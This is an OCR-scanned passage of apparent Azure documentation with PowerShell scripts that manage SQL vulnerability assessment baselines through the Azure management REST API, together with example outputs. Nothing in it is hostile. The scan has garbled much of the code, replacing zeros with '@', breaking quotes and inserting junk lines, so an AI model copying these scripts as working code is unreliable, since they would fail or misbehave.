Retry -action { GetSqlVulnerabilityAssessmentScanOnSystemDatabase - 
SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName - 
ServerName $ServerName -DatabaseName "master" } 

} 
catch { 

LogMessage -LogMessage "Failed to get latest scan results for master. 
Stopping the migration" 

LogMessage -LogMessage "You can revert back to classic configuration. 
For more information: https://learn.microsoft.com/en-us/azure/defender-for- 
cloud/sql-azure-vulnerability-assessment-manage?tabs=express#revert-back-to- 
the-classic-configuration" 

return 


# Apply baselines from each database 
$successMigration = @() 
$failedMigration = @() 
if (!$haveVaSetting) { 
# no need to migrate baseline as there is no baseline to extract. 
$successMigration = $databases 
} 
else { 
$i = @ 
foreach ($database in $Databases) { 
$i += 1 


$completed = ($i/$Databases.count) * 100 
Write-Progress -Activity "Processing" -Status "Progress:" - 
PercentComplete $completed 
try { 
if (! 
[string]::IsNullOrEmpty($baselines[$database.DatabaseName])) { 

LogMessage -LogMessage "Applying baseline for 
'$($database.DatabaseName)' database." 

Retry -action { 
SetSqlVulnerabilityAssessmentBaselineOnUserDatabase -SubscriptionId 
$SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName 
$ServerName -DatabaseName $database.DatabaseName -Baseline 
$baselines[$database.DatabaseName] } 

} 
LogMessage -LogMessage "Baseline was successfully applied for 
'$($database.DatabaseName)' database." 
$successMigration += $database.DatabaseName 
} 
catch { 
LogError "Failed to set baseline for $($database.DatabaseName) 
database." 
$failedMigration += $database.DatabaseName 


try { 
if (![string]::IsNullOrEmpty($baselines["master"])) { 


LogMessage -LogMessage "Applying baseline for ‘master’ 
database." 

Retry -action { 
SetSqlVulnerabilityAssessmentBaselineOnSystemDatabase -SubscriptionId 
$SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName 
$ServerName -DatabaseName "master" -Baseline $baselines["master"] } 

$successMigration += "master" 


} 

} 

catch { 
LogError "Failed to set baseline for master database." 
$failedMigration += "master" 

} 


if ($successMigration.Count -eq @) { 

LogError "Failed to set baseline for all the databases.” 

LogMessage -LogMessage "You can revert back to classic configuration. 
For more information: https://learn.microsoft.com/en-us/azure/defender-for- 
cloud/sql-azure-vulnerability-assessment-manage?tabs=express#revert-back-to- 
the-classic-configuration" 
} 
elseif ($failedMigration.Count -eq @) { 

LogMessage -LogMessage “The migration process completed successfully." 
} 
else { 

LogMessage -LogMessage "The migration process completed. The migration 
was successful for $($successMigration -join ',') and unsuccessful for 


$($failedMigration -join ',')" 

LogMessage -LogMessage "You can revert back to classic configuration. 
For more information: https://learn.microsoft.com/en-us/azure/defender-for- 
cloud/sql-azure-vulnerability-assessment-manage?tabs=express#revert-back-to- 
the-classic-configuration" 


} 
For example: 
PowerShell 
Write-Host "----------- Migrating To express configuration example --------- 
$ServerName = "<Your server name>" # The server name. 
$SubscriptionId = "<Your subscription>" # The subscription id that the 
servers belong to. 
$ResourceGroupName = "<Your resource group name>" # The resource group name 


that the servers belong to. 


. \MigratingToExpressConfiguration.ps1 -SubscriptionId $SubscriptionId - 
ResourceGroupName $ResourceGroupName -ServerName $ServerName 


Next steps 


For more information on the Azure PowerShell module, see Azure PowerShell 
documentation. 


Set up baselines for vulnerability 
assessments on Azure SQL databases 


Article e 04/13/2023 


This PowerShell script sets up baselines based on latest vulnerability assessment scan 
results for all databases in an Azure SQL Server. 


This sample requires Azure PowerShell Az 1.0 or later. Run Get-Module -ListAvailable 
Az to see which versions are installed. If you need to install, see Install Azure PowerShell 


module. 
Run Connect-AzAccount to sign in to Azure. 


If you don't have an Azure subscription, create an Azure free account’ before you 
begin. 


Sample script 


O Note 


We recommend that you use the Azure Az PowerShell module to interact with 
Azure. See Install Azure PowerShell to get started. To learn how to migrate to the 
Az PowerShell module, see Migrate Azure PowerShell from AzureRM to Az. 


PowerShell 


<# 
. SYNOPSIS 

This script sets the results of the last successful scan as baseline for 
each database under the selected Azure SQL Server. 


. DESCRIPTION 

This script check if the selected Azure SQL Server uses Vulnerability 
Assessment Express Configuration, iterates through all user databases under 
a server and sets the latest scan results as a baseline. 


#> 

$SubscriptionId = "<subscriptionid>" # The 
Subscription id that the server belongs to. 

$ResourceGroupName = "“<resource group>" # The 


Resource Group that the server belongs to. 
$ServerName = "<server name>" # The SQL 


server name that we want to apply the new SQL Vulnerability Assessment 
policy to (short name, without suffix). 
$APIVersion = "2022-05-01-preview" 


HHH New SQL Vulnerability Assessment Commands ###### 
JATEA ATTA ATTA ATTA TATA ATT 


function GetExpressConfigurationStatus($SubscriptionId, $ResourceGroupName, 
$ServerName) { 

$Uri = 
"https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ 
ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabili 
tyAssessments/Default?api-version=" + $APIVersion 

SendRestRequest -Method "GET" -Uri $Uri 


function SetLastScanAsBaselineOnSystemDatabase($Subscriptionid, 
$ResourceGroupName, $ServerName) { 

$Uri = 
"https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ 
ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabili 
tyAssessments/default/baselines/default ?systemDatabaseName=master&api- 
version=" + $APIVersion 

$Body = "{properties: {latestScan: true,results: {}}}" 

SendRestRequest -Method "PUT" -Uri $Uri -Body $Body 


function SetLastScanAsBaselineOnUserDatabase($Subscriptionld, 
$ResourceGroupName, $ServerName, $DatabaseName) { 

$Uri = 
"https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ 
ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$Dat 
abaseName/sqlVulnerabilityAssessments/default/baselines/default?api- 
version=" + $APIVersion 

$Body = "{properties: {latestScan: true,results: {}}}" 

SendRestRequest -Method "PUT" -Uri $Uri -Body $Body 


function SendRestRequest( 
[Parameter (Mandatory=$True) ] 
[string] $Method, 
[Parameter (Mandatory=$True) ] 
[string] $Uri, 
[parameter( Mandatory=$false )] 
[string] $Body = "DEFAULT") 


$AccessToken = Get-AzAccessToken 
$Token = "Bearer $($AccessToken. Token)" 


$headers = @{ 


'Authorization' = $Token 
} 
$Params = @{ 
Method = $Method 
Uri = $Uri 
Headers = $headers 
ContentType = "“application/json" 
} 
if(!($Body -eq "DEFAULT")) 
{ 
$Params = @{ 
Method = $Method 
Uri = $Uri 
Body = $Body 
Headers = $headers 
ContentType = "“application/json" 
} 
} 


Invoke-RestMethod @Params 


E E E E AEE E E E EE TEA ETETE 


# Connect 
Connect-AzAccount 
Set-AzContext $SubscriptionId 


# Check if Express Configuration is enabled 

$ECState = (GetExpressConfigurationStatus -SubscriptionId $SubscriptionId - 
ResourceGroupName $ResourceGroupName -ServerName 
$ServerName).properties.State 


Write-Host "Express Configuration status: " $ECState 


if ($ECState -eq "Enabled") 
{ 

# Get list of databases 

$databases = Get-AzSqlDatabase -ResourceGroupName $ResourceGroupName - 
ServerName $ServerName | where {$_.DatabaseName -ne "master"} 


# Set latest scan results as baseline on all user databases 
foreach ($database in $Databases) 
{ 
Write-Host "Set baseline on database: '$($database.DatabaseName) '" 
SetLastScanAsBaselineOnUserDatabase -SubscriptionId $SubscriptionId 
-ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName 
$database.DatabaseName 


} 


Write-Host "Set baseline on 'master' database" 
SetLastScanAsBaselineOnSystemDatabase -SubscriptionId $SubscriptionId - 
ResourceGroupName $ResourceGroupName -ServerName $ServerName 


} 


else 


{ 

Write-Host "The specified server does not have VA Express Configuration 
enabled therefore bulk baseline operations were not performed." 

return 


Next steps 


For more information on the Azure PowerShell module, see Azure PowerShell 
documentation. 


Express configuration PowerShell 
wrapper module 


Article e 06/05/2023 


This article contains the PowerShell wrapper for SQL vulnerability assessment express 
configuration. 


You should make a local copy of the script and save the file with the following file name 


SqlVulnerabilityAssessmentCommands.psm1. 


After you have made a local copy of the wrapper you should use the Express 


configuration PowerShell commands reference. 


SqlVulnerabilityAssessmentCommands.psm1 


PowerShell 


#Requires -Modules @{ ModuleName="Az.Sql"; ModuleVersion="3.11.0" } 
#Requires -Modules @{ ModuleName="Az.Accounts"; ModuleVersion="2.9.1" } 
#Requires -Version 5.1 


HHEHHHSQL Vulnerability Assessment PowerShell Commands ###### 
JOTA TA AT AT ATTA ATO A 


###Sq1 Vulnerability Assessment Baseline#t## 


# Create Or Update 
function Set-SqlVulnerabilityAssessmentBaseline([parameter (mandatory) ] 
[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName, 
[parameter(mandatory)] [string] $DatabaseName, [parameter (mandatory) ] 
[string] $Body) { 
<# 
. SYNOPSIS 
Sets vulnerability assessment baselines on the database. 


. DESCRIPTION 
Sets vulnerability assessment baselines on the database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


-PARAMETER ServerName 
Server name. 


.PARAMETER DatabaseName 
Database name. 


. PARAMETER Body 
Baseline. 


. EXAMPLE 

Set-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000- 
1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg 
-ServerName vulnerabilityaseessmenttest -DatabaseName db -Body '{ 
"properties": { "latestScan": true, aResultesa die kie 

Headers : {[Pragma, System.String[]], [x-ms-request-id, 
System.String[]], [x-ms-ratelimit-remaining-subscription-writes, 
System.String[]], [x-ms-correlation-request-id, System.String[]]...} 


Version graba] 
StatusCode : 200 
Method E PUT 
Content : {"properties":{"results":{"VA1143":[["True"]],"VA1219": 


[["False"]]}},"id":"/subscriptions/00000000- 1111-2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/serv 


ers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Def 


ault/baselines/Default", "name": "Default", "type": "Microsoft .Sql/servers/datab 
ases/sqlVulnerabilityAssessments/baselines"} 


. EXAMPLE 
Set-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000- 
1111-2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg 
-ServerName vulnerabilityaseessmenttest -DatabaseName db -Body '{ 
"properties": { 
"latestScan": false, 
"results": { 


"VA2062": [ 
[ 
"AllowAl11", 
“BoQoBo@ a 
dii a 2556255" 
i 
b 
d 
Headers : {[Pragma, System.String[]], [x-ms-request-id, 


System.String[]], [x-ms-ratelimit-remaining-subscription-writes, 
System.String[]], [x-ms-correlation-request-id, System.String[]]...} 


Version blea 
StatusCode : 200 
Method TREUT 
Content : {"properties":{"results":{"VA2062": 


[["AllowA11","0.0.0.0","255.255.255.255"]]}},"id":"/subscriptions/00000000- 
EEA SIE 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microso 


ft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsse 
ssments/Default/baselines/Default", "name": "Default", "type": "Microsoft.Sql/se 
rvers/databases/sqlVulnerabilityAssessments/baseline 
s"} 
#> 
if ($DatabaseName -eq ‘master') { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baseli 
nes/default?api-version=2022-02-01-preview&systemDatabaseName=master" 
} else { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/baselines/default?api-version=2022-02-01-preview" 


} 


return SendRestRequest -Method "Put" -Uri $Uri -Body $Body 


# Get 
function Get-SqlVulnerabilityAssessmentBaseline([parameter(mandatory) | 
[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName, 
[parameter(mandatory)] [string] $DatabaseName) { 
<# 
. SYNOPSIS 
Gets vulnerability assessment baselines for the user database. 


.DESCRIPTION 
Gets vulnerability assessment baselines for the user database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


.PARAMETER ServerName 
Server name. 


.PARAMETER DatabaseName 
Database name. 


. EXAMPLE 

Get-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000- 
1111-2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg 
-ServerName vulnerabilityaseessmenttest -DatabaseName db 

Headers : {[Pragma, System.String[]], [x-ms-request-id, 
System.String[]], [x-ms-ratelimit-remaining-subscription-reads, 
System.String[]], [x-ms-correlation-request-id, System.String[]]...} 


Version eal sal 
StatusCode : 200 
Method SAGET 


Content : {"properties":{"results":{"VA1143":[["True"]],"VA1219": 


[["False"]]}},"id":"/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/serv 


ers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Def 
ault/baselines/Default", "name": "Default", "type": "Microsoft .Sql/servers/datab 
ases/sqlVulnerabilityAssessments/baselines"} 


#> 


if ($DatabaseName -eq 'master') { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baseli 
nes/default?api-version=2022-02-01-preview&systemDatabaseName=master" 
} else { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/baselines/default?api-version=2022-02-01-preview" 


} 
return SendRestRequest -Method "Get" -Uri $Uri 


###Database Sql Vulnerability Assessment Rule Baselines### 


# Create Or Update 
function Set-SqlVulnerabilityAssessmentBaselineRule( [parameter (mandatory) ] 
[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName, 
[parameter(mandatory)] [string] $DatabaseName, [parameter (mandatory) ] 
[string] $RuleId, [parameter(mandatory)] [string] $Body) { 
<# 

. SYNOPSIS 

Sets vulnerability assessment baseline for a specific rule on the 
database. 


. DESCRIPTION 
Sets vulnerability assessment baseline for a specific rule on the 
database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


»-PARAMETER ServerName 
Server name. 


. PARAMETER DatabaseName 
Database name. 


.»PARAMETER RulelId 
Rule id. 


PARAMETER Body 
Baseline. 


. EXAMPLE 
Set-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000- 
1111-2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg 
-ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062 - 
Body '{ 
"properties": { 
"latestScan": false, 
"results": [ 


[ 
"AllowAll", 
”0.0.0.05,; 
255725572557255 
] 
] 
E 
y 
Headers : {[Cache-Control, System.String[]], [Pragma, 


System.String[]], [x-ms-request-id, System.String[]], [Server, 
System.String[]]...} 


Version E GEA) 
StatusCode : 200 
Method PUT 
Content : {"properties":{"results": 


[["AllowA11","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/00000000- 
1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/dat 


abases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062 
","name":"VA2062", "type": "Mic 


rosoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"} 
#> 
if ($DatabaseName -eq ‘master') { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baseli 
nes/default/rules/$RuleId" + "?api-version=2022-@2-01- 
preview&systemDatabaseName=master"™ 
} else { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-@2- 


@1-preview" 

} 

return SendRestRequest -Method "Put" -Uri $Uri -Body $Body 
} 
# Get 


function Get-SqlVulnerabilityAssessmentBaselineRule( [parameter (mandatory) ] 


[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName, 
[parameter(mandatory)] [string] $DatabaseName, $RuleId) { 
<# 
. SYNOPSIS 
Gets vulnerability assessment baseline for a specific rule from the 
database. 


.DESCRIPTION 
Gets vulnerability assessment baseline for a specific rule from the 
database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


.PARAMETER ServerName 
Server name. 


.PARAMETER DatabaseName 
Database name. 


.PARAMETER RuleId 
Rule id. 


. EXAMPLE 
Get-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000- 
1111-2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg 
-ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062 
Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 
System.String ] ]...} 


Version STI 
StatusCode : 200 
Method : GET 
Content : {"properties":{"results": 


[["AllowA11","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/e@e@eeee0e- 
1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/dat 


abases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062 
", "name": "VA2@62", "type": "Mic 


rosoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"} 


. EXAMPLE 
Get -SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000- 
1111-2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg 
-ServerName vulnerabilityaseessmenttest -DatabaseName db 
Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 
System.String[ ] ]...} 


Version Saka 

StatusCode : 200 

Method : GET 

Content : {"value":[{"properties":{"results": 
[["True"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/r 


esourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/ 
vulnerabilityaseessmenttest/databases/db/sqlVulnerab 


ilityAssessments/Default/baselines/default/rules/VA1143", "name": "VA1143", "ty 
pe": "Microsoft.Sql/servers/dat 
abases/sqlVulnerabilityAssessments/baselines"}, 
{"properties":{"results":[["False"]]},"id":"/subscriptions/ 
00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 


t.Sql/servers/m 


igrationsql1/databases/db/sqlVulnerabilityAssessments/Default/baselines/defa 
ult/rules/VA1219", "name": "VA1 


219", "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/bas 
elines"},{"properties":{"resul 

es § 
[["AllowA11","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/e@e@eee000- 
1111-2222-3333-444444444444/ 


resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers 
/vulnerabilityaseessmenttest/databases/db/sqlVulnera 


bilityAssessments/Default/baselines/default/rules/VA2@62", "name" :"VA2062","t 
ype" :"Microsoft.Sql/servers/da 
tabases/sqlVulnerabilityAssessments/baselines"}]} 
#> 
if ($DatabaseName -eq ‘master') { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baseli 
nes/default/rules/$RuleId" + "?api-version=2022-02-01- 
preview&systemDatabaseName=master" 
} else { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-@2- 
@1-preview" 


} 


return SendRestRequest -Method "Get" -Uri $Uri 


# Remove 

function Remove- 
SqlVulnerabilityAssessmentBaselineRule([parameter(mandatory)] [string] 
$SubscriptionId, [parameter(mandatory)] [string] $ResourceGroupName, 
[parameter(mandatory)] [string] $ServerName, [parameter(mandatory)] [string] 


$DatabaseName, [parameter(mandatory)] [string] $RulelId) { 
<# 
. SYNOPSIS 


Deletes vulnerability assessment baseline for a specific rule from 
the database. 


.DESCRIPTION 
Deletes vulnerability assessment baseline for a specific rule from 
the database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


.PARAMETER ServerName 
Server name. 


.PARAMETER DatabaseName 
Database name. 


.PARAMETER RuleId 
Rule id. 


. EXAMPLE 

Remove-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 
00000000-1111-2222-3333-444444444444-ResourceGroupName 
vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest - 
DatabaseName db -RuleId VA2062 

Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 

System.String ] ]...} 


Version graba 
StatusCode : 200 
Method DELETE 
Content 
#> 
if ($DatabaseName -eq ‘master') { 
$Uri = 


"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baseli 
nes/default/rules/$RuleId" + "“?api-version=2022-02-01- 
preview&systemDatabaseName=master" 

} else { 

$Uri = 

"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-@2- 
@1-preview" 


} 


return SendRestRequest -Method "Delete" -Uri $Uri 


###Sql Vulnerability Assessment Scan Result### 


# Get 
function Get-SqlVulnerabilityAssessmentScanResults([parameter (mandatory) ] 
[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName, 
[parameter(mandatory)] [string] $DatabaseName, [parameter (mandatory) ] 
[string] $ScanId, $RulelId) { 
<# 

. SYNOPSIS 

Gets vulnerability assessment scan results for a specific rule from 
the database. 


. DESCRIPTION 


Gets vulnerability assessment scan results for a specific rule from 
the database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


-PARAMETER ServerName 
Server name. 


. PARAMETER DatabaseName 
Database name. 


.PARAMETER ScanId 
Scan id. 


.PARAMETER RuleId 
Rule id. 


. EXAMPLE 

Get -SqlVulnerabilityAssessmentScanResults -SubscriptionId 00000000- 
1111-2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg 
-ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest - 
RuleId VA2062 

Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 

System.String[ ] ]...} 


Version Saba] 
StatusCode : 200 
Method 8 EEI 
Content : {"properties": 


{"ruleId":"VA2062", "status": "NonFinding", “errorMessage":null, “isTrimmed": fal 
se, "queryResults 

":[],"remediation":{"description":"Remove database 
firewall rules that grant excessive access", "scripts":[ 


], "automated": false, "portalLink":""}, "baselineAdjustedResult":null, "ruleMeta 
data": {"ruleId":"VA2@62", "seve 


ELEIZ "High", "category": "SurfaceAreaReduction", "ruleType": "NegativeList", "ti 
tle":"Database-level firewall 

rules should not grant excessive 
access", "description":"The Azure SQL Database-level firewall helps protec 

t your data by preventing all access to your database 
until you specify which IP addresses have permission 

. Database-level firewall rules grant access to the 
specific database based on the originating IP address 

of each request.\n\nDatabase-level firewall rules for 
master and user databases can only be created and ma 

naged through Transact-SQL (unlike server-level firewall 
rules which can also be created and managed using 

the Azure portal or PowerShell). For more details please 
see: https://docs.microsoft.com/en-us/azure/sql- 

database/sql-database-firewall-configure\n\nThis check 
verifies that each database-level firewall rule doe 

s not grant access to more than 255 IP 
addresses.","rationale":"Often, administrators add rules that grant 

excessive access as part of a troubleshooting process - 
to eliminate the firewall as the source of a prob 

lem, they simply create a rule that allows all traffic 
to pass to the affected database.\n\nGranting exces 

sive access using database firewall rules is a clear 
security concern, as it violates the principle of lea 

st privilege by allowing unnecessary access to your 
database. In fact, it's the equivalent of placing the 

database outside of the firewall.", “queryCheck": 
{"query":"SELECT name AS [Firewall Rule Name]\n ,start_ 

ip_address AS [Start Address]\n y»end_ip_address AS 
[End Address]\nFROM sys.database_ firewall _rules\nWHE 


RE ( \n (CONVERT (bigint, 
parsename(end_ip_address, 1)) +\n CONVERT(bigint, parsename(end_ip 

_address, 2)) * 256 + \n CONVERT (bigint, 
parsename(end_ip address, 3)) * 65536 + \n CONVER 

T(bigint, parsename(end_ip address, 4)) * 16777216 ) \n 
- \n (CONVERT(bigint, parsename(star 

t_ip_address, 1)) +\n CONVERT (bigint, 
parsename(start_ip address, 2)) * 256 + \n CONVERT (b 


igint, parsename(start_ip_address, 3)) * 65536 + \n 
CONVERT(bigint, parsename(start_ip address, 4) 

dk Ge S777 216m) NM ) > 255","expectedResult”: 
[],"columnNames":["Firewall Rule Name", "Start Address", "En 

d Address" ]}, "benchmarkReferences”: 
[]}},"id":"/subscriptions/00000000-1111 -2222-3333-444444444444/resource 


Groups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnera 
bilityaseessmenttest/databases/db/sqlVulnerabilityAs 


sessments/Default/scans/VA2062/scanResults/VA2062", "name": "VA2@62","type":"M 
icrosoft.Sql/servers/databases 
/sqiVulnerabilityAssessments/scans/scanResults"} 


. EXAMPLE 
Get -SqlVulnerabilityAssessmentScanResults -SubscriptionId 00000000- 
1111-2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg 


-ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest 
Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 
System. String[ ] ]...} 


Version be) 
StatusCode : 200 
Method SAGET 
Content : {"value":[ 


{"properties":{"ruleId":"VA1219","status":"No 
nFinding","errorMessage":null,"isTrimmed":false,"queryResults": 
[["False"]], "remediation": {"description":"E 

nable TDE on the affected databases", "scripts": 
[], "automated": false, "portalLink":"EnableTDE"}, "baselineAdj 

ustedResult":{"baseline":{"expectedResults": 
[["False"]], "updatedTime" :"2023-@5-15T@8:52:39.3476874+00: 00"} 

» Status": "NonFinding", "resultsNotInBaseline": 
[],"resultsOnlyInBaseline":[]}, "ruleMetadata":{"ruleId":"VA1 
219", "severity": "Medium", "category": " 
tle":"Transparent data encrypt 

ion should be enabled","description": "Transparent data 
encryption (TDE) helps to protect the database file 

s against information disclosure by performing real-time 
encryption and decryption of the database, associ 

ated backups, and transaction log files ‘at rest’, 
without requiring changes to the application. This rule 

checks that TDE is enabled on the 
database.","rationale":"Transparent Data Encryption (TDE) protects data 

‘at rest', meaning the data and log files are encrypted 
when stored on disk.","“queryCheck":{"query": SELE 


DataProtection", "ruleType": "Binary", "ti 


CT CASE\n WHEN EXISTS (\n SELECT 
AA FROM sys.databases\n 
WHERE db_name(database_id) = db_name()\n 
AND is_encrypted = @\n IMD 
THEN 1\n ELSE @\n END AS 


[Violation]","expectedResult":[["0"]],"columnNames":["Vi 
olation"]},"benchmarkReferences": 

[{"benchmark": "FedRAMP", "reference" :nul1}]}},"id":"/subscriptions/feee000 
00=1111722227333325 

444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 

t.Sql/servers/ 


vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default 
/scans/VA1219/scanResults/VA1219", "name": "VA1219", " 
type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/sca 
nResults"}, {"prope 

rties": 
{"ruleId":"VA1223", "status": "NonFinding", “errorMessage":null, “isTrimmed": fal 
se, "queryResults":[],"r 

emediation":{"description":"Create new certificates, re- 
encrypt the data/sign-data using the new key, and 

drop the affected keys.","scripts": 
[], "automated": false, "portalLink":""}, "baselineAdjustedResult":null, "ru 


leMetadata": 
{"ruleId":"VA1223","severity": "High", "category": "DataProtection", "ruleType": 
"NegativeList", "ti 

tle": "Certificate keys should use at least 2048 
bits", "description":"Certificate keys are used in RSA and 

other encryption algorithms to protect data. These keys 
need to be of enough length to secure the user's d 

ata. This rule checks that the key's length is at least 
2048 bits for all certificates.", "rationale": "Key 

length defines the upper-bound on the encryption 
algorithm's security. Using short keys in encryption algo 

rithms may lead to weaknesses in data-at-rest 
protection.", "queryCheck":{"query":"SELECT name AS [Certific 

ate Name], thumbprint AS [Thumbprint]\nFROM 
sys.certificates\nWHERE key_length < 2048","expectedResult":[] 

» columnNames":["Certificate 
Name", “Thumbprint"]}, “benchmarkReferences": 
[{"benchmark": "FedRAMP", "reference 

":null}]}}, "id": "/subscriptions/00000000-1111-2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/p 


roviders/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlV 
ulnerabilityAssessments/Default/scans/VA122 


3/scanResults/VA1223", "name": "VA1223", "type": "Microsoft.Sql/servers/database 
s/sqlVulnerabilityAssessments/ 
scans/scanResults"}]} 
#> 


if ($DatabaseName -eq ‘master') { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/scans/ 
$ScanId/scanResults/$RuleId" + "?api-version=2022-02-01- 
preview&systemDatabaseName=master"™ 
} else { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
